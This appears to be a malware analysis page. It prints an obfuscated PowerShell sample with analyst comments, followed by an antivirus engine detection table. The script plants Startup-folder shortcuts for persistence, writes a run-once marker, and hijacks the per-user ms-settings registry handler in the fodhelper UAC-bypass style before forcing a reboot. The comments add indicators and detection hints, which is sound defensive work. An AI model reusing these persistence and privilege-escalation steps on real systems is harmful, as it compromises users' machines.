# Shortcut writer for the second ("y") batch launcher. Saves a .lnk at the path
# given in the first parameter whose target is whatever ${/_//_//_/} holds when
# the function is called. Minimized window (style 7), Internet Explorer icon,
# second parameter never read.
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\//
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = ""
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Final stage: second Startup shortcut, run-once marker, per-user registry
# hijack of the ms-settings handler, then a forced reboot.
# The Base64 literal decodes to "startup".
${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
# Both embedded variables are undefined in the visible lines; the shortcut writer never reads this argument.
${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
# "<Startup>\<token>y.lnk" -> the second generated .cmd launcher.
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}y.lnk"
_____/\_/\/\_/\/=\// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
# Writes the run token to the marker file "L21" in the public staging
# directory, three times with three different write methods. The script exits
# early on later runs when this file exists.
${_/\/\/\__\\\\\\\|||\/\/_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
${_/\/\/\__\\\\\\\|||\/\/_} | Set-Content "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
${_/\/\/\__\\\\\\\|||\/\/_} | Out-File "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
${_/\/\/\__\\\\\\\|||\/\/_} > "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
# Registry IoC: creates HKCU:\Software\Classes\ms-settings\Shell\Open\command,
# adds an empty "DelegateExecute" value and points "(default)" at
# "<base><token>\<token>i7.exe". This key layout is the one abused in
# fodhelper-style UAC bypasses; fodhelper.exe itself is not started in the
# visible lines. Detection hint: any write to this per-user key is rare on a
# healthy host and worth alerting on.
New-Item "${_um_}" -Force
New-ItemProperty -Path "${_um_}" -Name "${_tres_}" -Value "" -Force
Set-ItemProperty -Path "${_um_}" -Name "${_qtro_}" -Value "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}i7${_ex_}" -Force
# Forces a restart after 15 seconds; the Startup shortcuts then run at the next
# logon. An unexpected reboot shortly after a PowerShell run is a triage signal.
shutdown /r /t 15
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Win.Trojan.PowerMacro-5942596-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Script.Save.6d8eeaf9
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/RiskWare.Agent.U
TrendMicro-HouseCall Clean
Avast PwrSh:Downloader-BH [Trj]
Cynet Malicious (score: 99)
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.231.CBECF13B
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.231.CBECF13B
Tencent Clean
Sophos Troj/PSDl-VV
F-Secure Trojan.TR/PShell.Dldr.VPJ
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.231.CBECF13B
TrendMicro Clean
FireEye Heur.BZC.PZQ.Boxter.231.CBECF13B
Emsisoft Heur.BZC.PZQ.Boxter.231.CBECF13B (B)
GData Heur.BZC.PZQ.Boxter.231.CBECF13B
Jiangmin Clean
Varist PSH/Agent.LF
Avira TR/PShell.Dldr.VPJ
MAX malware (ai score=84)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.231.CBECF13B
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG PwrSh:Downloader-BH [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.